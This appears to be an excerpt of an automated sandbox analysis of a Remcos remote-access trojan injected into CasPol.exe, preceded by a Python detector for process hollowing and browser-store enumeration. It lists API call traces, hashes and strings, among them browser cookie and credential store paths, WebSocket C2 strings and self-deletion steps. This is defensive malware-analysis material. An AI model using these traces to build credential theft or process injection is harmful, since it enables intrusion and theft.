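            stage, evidence = 3, evidence + [c]
        elif stage == 3 and c.name in RESUME:
            return evidence + [c]
    return None


# Path fragments of the browser credential store named in this report section.
BROWSER_STORE_MARKERS = ("\\Mozilla\\Firefox\\Profiles\\", "cookies.sqlite")


def find_browser_store_enumeration(calls, strings):
    """Strings naming a browser profile store, if the function also walks directories."""
    walks = any(c.name.startswith("FindFirstFile") for c in calls)
    hits = [s for s in strings if any(m.lower() in s.lower() for m in BROWSER_STORE_MARKERS)]
    return hits if walks else []


def analyze(text):
    calls, strings = parse_dump(text)
    chain = find_hollowing(calls)
    return {
        "process_hollowing": [f"{c.name}@{c.ref:08X}" for c in chain] if chain else [],
        "browser_store_enumeration": find_browser_store_enumeration(calls, strings),
    }


if __name__ == "__main__":
    for label, dump in (("12_2_400000", HOLLOWING_DUMP), ("12_2_10000000", FIREFOX_DUMP)):
        print(label, analyze(dump))
```

The hollowing rule is deliberately staged rather than a bag of API names: VirtualAlloc, ReadProcessMemory and even WriteProcessMemory appear in plenty of benign code, and what makes this function hollowing is the order (suspended child, image replaced, context rewritten, resumed). A practitioner extending it would add the argument checks the report makes possible, for example NtCreateSection's protection (00000040) and allocation attributes (08000000), and run it over the Executed-only subset of calls where that information is available.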
APIs
• FindFirstFileW.KERNEL32(?,?,?,00000000,75570F00), ref: 10007ED1
• FindNextFileW.KERNELBASE(00000000,?,?,00000000,75570F00), ref: 10007F0A
• RemoveDirectoryW.KERNEL32(?,?,00000000,75570F00), ref: 10007FFA
• SetFileAttributesW.KERNEL32(?,00000080,?,00000000,75570F00), ref: 1000802D
• DeleteFileW.KERNEL32(?,?,00000000,75570F00), ref: 1000803A
• GetLastError.KERNEL32(?,00000000,75570F00), ref: 1000806D
• FindClose.KERNEL32(00000000,?,00000000,75570F00), ref: 10008079
• RemoveDirectoryW.KERNEL32(?,?,00000000,75570F00), ref: 10008082
• FindClose.KERNEL32(00000000,?,00000000,75570F00), ref: 1000808C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2341273852-0
                                                                                                                                                                                                                                  • Opcode ID: 924e4a1749d0d59d34f62a1f8ef7dddde271016198b3f9fb598245e3bb22b1f8
                                                                                                                                                                                                                                  • Instruction ID: 5879e413a2d9e2f3862ed2fa56462b92cd9797ab3db8e6e954221e2a185392ff
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 924e4a1749d0d59d34f62a1f8ef7dddde271016198b3f9fb598245e3bb22b1f8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC61F03890025B8AEB50DF64C885BF6B3B5FF143D4F5141E9EC0997295EB329E86CB60
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 04571137
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 04571151
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 0457115C
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 0457116D
                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 0457117C
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 04571193
                                                                                                                                                                                                                                  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 045711D0
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 045711DB
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1083526818-0
                                                                                                                                                                                                                                  • Opcode ID: a042cfd7a2283d79fbdbaaaab7bbee27343e0db184172449480b93bb34728672
                                                                                                                                                                                                                                  • Instruction ID: 5e1049d62e086c6ae7a4aaff2da60a32c03838a88ee2b8fcc2a5814c6281808b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a042cfd7a2283d79fbdbaaaab7bbee27343e0db184172449480b93bb34728672
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5219E72504309ABD720EA64BC48F9B7BACFF84314F04093AB998D3190FB34E6089796
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                                                                                                                                    • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                                                                                                                                    • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040E672
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                                                                                                                                  • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                                                                                                                                                                  • API String ID: 2281282204-3981147832
                                                                                                                                                                                                                                  • Opcode ID: dc5cd3b950707be250f4626283970aa53dc17a48cc22471f6a110bb8d9872840
                                                                                                                                                                                                                                  • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc5cd3b950707be250f4626283970aa53dc17a48cc22471f6a110bb8d9872840
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                                                                                                                                                                  • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3525466593-0
                                                                                                                                                                                                                                  • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                                                                                                                                                  • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(00000001,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404946
                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404994
                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Create$EventLocalThreadTime
• String ID: KeepAlive | Enabled | Timeout:
• API String ID: 2532271599-1507639952
• Opcode ID: a4ae7698bbb6c3538385491ed6a526f7ae5f1a2b6b2491b670bdf3ee0830e6aa
• Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
• Opcode Fuzzy Hash: a4ae7698bbb6c3538385491ed6a526f7ae5f1a2b6b2491b670bdf3ee0830e6aa
• Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
APIs
• CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
• CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
• CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Crypt$Context$AcquireRandomRelease
• String ID:
• API String ID: 1815803762-0
• Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
• Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
• Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
• Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
APIs
• GetComputerNameExW.KERNEL32(00000001,?,0000002B,00474358), ref: 0041A7BF
• GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Name$ComputerUser
• String ID:
• API String ID: 4229901323-0
• Opcode ID: cde94d6ab6d559736168707b99f603480b027a4e5b0d27f6afb59f5a93c8ae6f
• Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
• Opcode Fuzzy Hash: cde94d6ab6d559736168707b99f603480b027a4e5b0d27f6afb59f5a93c8ae6f
• Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
APIs
• GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
• Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
• Opcode Fuzzy Hash: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
• Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1

Control-flow Graph

(Rendered graph not reproduced. It covers the function starting at 0x40D767, with basic blocks through 0x40E154, and the subroutines it calls. Windows API calls that appear on the graph's paths: GetModuleFileNameW, CreateThread at several call sites, StrToIntA, SetProcessDEPPolicy, DeleteFileW and Sleep. In the original rendering, node colouring distinguishes executed from not-executed blocks.)
APIs
  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
• GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 0040D790
  • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                                                                                                                                  • String ID: 0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-EC111K$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                                                                                                                                                                                  • API String ID: 2830904901-2405482432
                                                                                                                                                                                                                                  • Opcode ID: 7ac484e1e60128ce9aa6a1ae0a508b75fc070fd572a4dba106659cdb8598b837
                                                                                                                                                                                                                                  • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ac484e1e60128ce9aa6a1ae0a508b75fc070fd572a4dba106659cdb8598b837
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

Control-flow Graph
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID:
• String ID: Connection: Upgrade$ERROR: Could not parse WebSocket url: %s$ERROR: Got bad status connecting to %s: %s$ERROR: Got invalid status line connecting to: %s$GET /%s HTTP/1.1$HTTP/1.1 %d$Host: %s$Host: %s:%d$Origin: %s$P$Sec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==$Sec-WebSocket-Version: 13$Unable to connect to %s:%d$Upgrade: websocket$e$ws://%[^:/]$ws://%[^:/]/%s$ws://%[^:/]:%d$ws://%[^:/]:%d/%s
• API String ID: 0-1585909395
• Opcode ID: 12572963b92fc2fbb6932ee6605c50527e2d8c00a7f48e67dae44c0a149c157e
• Instruction ID: 8c5c428c0198e8a7c9dce20c2a40cf958e763ea39fc21358b4929ecef954cfc7
• Opcode Fuzzy Hash: 12572963b92fc2fbb6932ee6605c50527e2d8c00a7f48e67dae44c0a149c157e
• Instruction Fuzzy Hash: 1FE1F1B5900214AEFB14CF64DC85FEEB7B8EB05394F848195F609A7086D372AB49CF64

Control-flow Graph
APIs
• Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
• WSAGetLastError.WS2_32 ref: 00414249
• Sleep.KERNEL32(00000000,00000002), ref: 00414B88
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Sleep$ErrorLastLocalTime
• String ID: | $%I64u$5.3.0 Pro$@CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-EC111K$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
• API String ID: 524882891-2209054499
• Opcode ID: c5bc1d6d1b6c3047afbd33f1437955fe0c167a04afa276ca49836680c978097d
• Instruction ID: a0bb0b13232d9f5991351636829aab2dda2428bc81dc0b9639db3628de0ead2f
• Opcode Fuzzy Hash: c5bc1d6d1b6c3047afbd33f1437955fe0c167a04afa276ca49836680c978097d
• Instruction Fuzzy Hash: 58524E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,10006E4E), ref: 10007252
• GetProcAddress.KERNEL32(00000000), ref: 1000725B
• GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,10006E4E), ref: 1000726C
• GetProcAddress.KERNEL32(00000000), ref: 1000726F
• LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,10006E4E), ref: 10007286
• GetProcAddress.KERNEL32(00000000), ref: 10007289
• LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,10006E4E), ref: 1000729A
• GetProcAddress.KERNEL32(00000000), ref: 1000729D
• LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,10006E4E), ref: 100072AE
• GetProcAddress.KERNEL32(00000000), ref: 100072B1
• LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,10006E4E), ref: 100072C2
• GetProcAddress.KERNEL32(00000000), ref: 100072C5
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: AddressProc$LibraryLoad$HandleModule
• String ID: GetFinalPathNameByHandleW$NtQueryInformationProcess$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$Rstrtmgr$Rstrtmgr$Rstrtmgr$kernel32$ntdll
• API String ID: 4236061018-788455005
• Opcode ID: 15c6b04f8a56a6077895a4e2c88de4e1754fac2b079e60f4a3e8d9701f116bca
• Instruction ID: 04275e680396dfb4a641f74b6e8e1366635206651eabc041964a765234593f91
• Opcode Fuzzy Hash: 15c6b04f8a56a6077895a4e2c88de4e1754fac2b079e60f4a3e8d9701f116bca
• Instruction Fuzzy Hash: 38111F74C01228E9FA61FBF19CEDFA73A98FB40290FA10416F60953060C738564ADF94

Control-flow Graph: rendered graph not reproduced; the graph data covers basic blocks 10001f42 through 100024ea and references CreateDirectoryW, CopyFileW, CreateFileW, WriteFile and CloseHandle.
APIs
• CreateDirectoryW.KERNEL32(?,00000000,?,00000000,000000FF,?,00000000), ref: 10001F5F
• CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 10001FA8
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: CopyCreateDirectoryFile
• String ID: Network$User Data$\Cookies$\Local State$\Local State$\Network\Cookies$\Secure Preferences$\Secure Preferences$invalid vector<T> subscript$-
• API String ID: 3761107634-3418363220
• Opcode ID: 6543eb47e2eb3d4cb808ab73e9c761b45a59b7d1ab0deb3a85e919aee3a5a40f
• Instruction ID: d59edb435599a471555a78990484bb1f50df8ad1d5918936d629013e8b7aebb2
• Opcode Fuzzy Hash: 6543eb47e2eb3d4cb808ab73e9c761b45a59b7d1ab0deb3a85e919aee3a5a40f
• Instruction Fuzzy Hash: 20028AB0D002189FEF04CFA4DC85BEEBBB5FF58344F114499E80AAB255DB74AA85CB51

Control-flow Graph: rendered graph not reproduced; the graph data covers basic blocks 411c81 through 4123f6 and references GetModuleFileNameW, Sleep and DeleteFileW.
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,75573530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
  • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
